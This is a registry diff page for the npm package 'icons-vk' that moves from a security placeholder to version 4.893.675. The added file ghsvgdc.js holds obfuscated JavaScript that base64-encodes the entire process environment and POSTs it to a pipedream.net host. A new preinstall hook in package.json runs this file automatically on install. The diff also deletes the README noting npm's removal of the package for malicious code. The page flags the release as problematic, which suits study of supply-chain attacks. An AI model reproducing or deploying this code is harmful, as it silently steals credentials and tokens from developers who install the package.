icons-vk 0.0.1-security → 4.893.675
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of icons-vk might be problematic. Click here for more details.
- package/ghsvgdc.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/ghsvgdc.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x60426=a0_0x40b7;function a0_0x40b7(_0x6c64f8,_0x2f019a){const _0xeedd67=a0_0xeedd();return a0_0x40b7=function(_0x40b79e,_0x4b9135){_0x40b79e=_0x40b79e-0x68;let _0xcc6bfd=_0xeedd67[_0x40b79e];return _0xcc6bfd;},a0_0x40b7(_0x6c64f8,_0x2f019a);}(function(_0x16c6d5,_0xc43439){const _0x434cbe=a0_0x40b7,_0x237b90=_0x16c6d5();while(!![]){try{const _0x26aefd=-parseInt(_0x434cbe(0x71))/0x1*(parseInt(_0x434cbe(0x7c))/0x2)+parseInt(_0x434cbe(0x7b))/0x3+-parseInt(_0x434cbe(0x78))/0x4+parseInt(_0x434cbe(0x79))/0x5+-parseInt(_0x434cbe(0x6a))/0x6+parseInt(_0x434cbe(0x70))/0x7+parseInt(_0x434cbe(0x77))/0x8;if(_0x26aefd===_0xc43439)break;else _0x237b90['push'](_0x237b90['shift']());}catch(_0x4f4799){_0x237b90['push'](_0x237b90['shift']());}}}(a0_0xeedd,0x30cfc));const http=require(a0_0x60426(0x6b));function a0_0xeedd(){const _0x33a9ef=['stringify','1125645XdkIHJ','93406jJCobW','env','write','2154714COOxdm','https','POST','request','from','end','55300BpXeat','1TFEXwR','base64','pipedream','npm_package_name','d967104b6c9e3e7ee7e7f8bad1ba7209','join','573392LEjyxM','344804EaRjch','1185830ygmyoT'];a0_0xeedd=function(){return _0x33a9ef;};return a0_0xeedd();}req=http[a0_0x60426(0x6d)]({'host':[a0_0x60426(0x75),'m',a0_0x60426(0x73),'net'][a0_0x60426(0x76)]('.'),'path':'/'+(process[a0_0x60426(0x68)][a0_0x60426(0x74)]||''),'method':a0_0x60426(0x6c)}),req[a0_0x60426(0x69)](Buffer[a0_0x60426(0x6e)](JSON[a0_0x60426(0x7a)](process[a0_0x60426(0x68)]))['toString'](a0_0x60426(0x72))),req[a0_0x60426(0x6f)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "icons-vk",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "4.893.675",
|
|
4
|
+
"main": "ghsvgdc.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node ghsvgdc.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=icons-vk for more information.
|